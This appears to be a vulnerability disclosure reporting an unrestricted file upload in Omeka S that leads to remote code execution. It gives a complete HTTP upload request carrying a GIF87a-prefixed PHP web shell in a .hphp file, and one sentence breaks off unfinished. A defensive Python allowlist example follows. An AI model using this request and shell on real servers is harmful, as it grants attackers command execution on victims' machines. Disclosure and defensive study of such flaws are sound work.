Unrestricted Upload File leads to Remote Code Execution in omeka/omeka-s
Aug 2nd 2023
The file upload function is vulnerable: a user can upload files with other extensions (.php, .phps, ...) by using the magic bytes technique. However, the .htaccess file blocks almost all files with extensions such as php, phps, phtml, ...
The attacker can still upload a .hphp file and then execute code from a remote machine.
The Apache server hosting the web application needs to be able to execute the
Proof of Concept
Step 1: Log in, go to the function that allows uploading, intercept the request, and modify it as below
POST /omeka-s/admin/asset/add
Host: localhost
Content-Length: 344
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/omeka-s/admin/asset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi
Connection: close

------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="file"; filename="shell_php.hphp"
Content-Type: application/octet-stream

GIF87a
echo system($_REQUEST['cmd']);
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="o:alt_text"

------WebKitFormBoundary9KHufs2z61gFOMA6--
With the magic bytes GIF87a, the attacker bypasses the file check and can then upload a file (.hphp) whose extension is not in the whitelist.
Step 2: Check the file path
Step 3: Access the file path and execute commands
An attacker could use this vulnerability to get code execution on the victim machine.
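The root cause above is a content check that only looks at leading magic bytes, combined with an extension denylist in .htaccess that does not cover every handler-mapped extension. The following is an added example, not code from the report or from Omeka S, that contrasts such a magic-bytes-only check with an extension-allowlist validator; the allowlist, signatures and sample files are constructed for the illustration (the .hphp file mirrors the shape of the request shown above, with the script body replaced by a placeholder).

```python
# Added example (not Omeka S code): magic-bytes-only check vs. allowlist validator.
# Signatures, allowlist and sample files are constructed for this illustration.

MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
}
ALLOWED_EXTENSIONS = set(MAGIC)


def naive_check(data: bytes) -> bool:
    """Content-only check: accepts any payload that starts with a known signature.
    This is the weak pattern the report bypasses by prefixing GIF87a."""
    return any(data.startswith(sig) for sigs in MAGIC.values() for sig in sigs)


def strict_check(filename: str, data: bytes) -> bool:
    """Allowlist the extension first, then require the content to match that type.
    Anything not on the allowlist (.php, .phtml, .hphp, ...) is rejected outright,
    so the server-side denylist in .htaccess is no longer the last line of defence."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:   # reject missing, multiple or leading-dot extensions
        return False
    ext = parts[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return any(data.startswith(sig) for sig in MAGIC[ext])   # content must match the claimed type


# Constructed sample uploads: (filename, bytes)
SAMPLES = {
    "shell_php.hphp": b"GIF87a" + b"<placeholder script body>",  # polyglot shape from the report
    "image.gif": b"GIF87a" + b"\x00" * 16,                       # benign GIF
    "notes.pdf": b"GIF87a" + b"\x00" * 16,                       # allowed ext, mismatched content
}


def evaluate() -> dict:
    """Return {filename: (naive_result, strict_result)} for every sample."""
    return {name: (naive_check(data), strict_check(name, data)) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, strict) in evaluate().items():
        print(f"{name:16} naive={naive!s:5} strict={strict}")
```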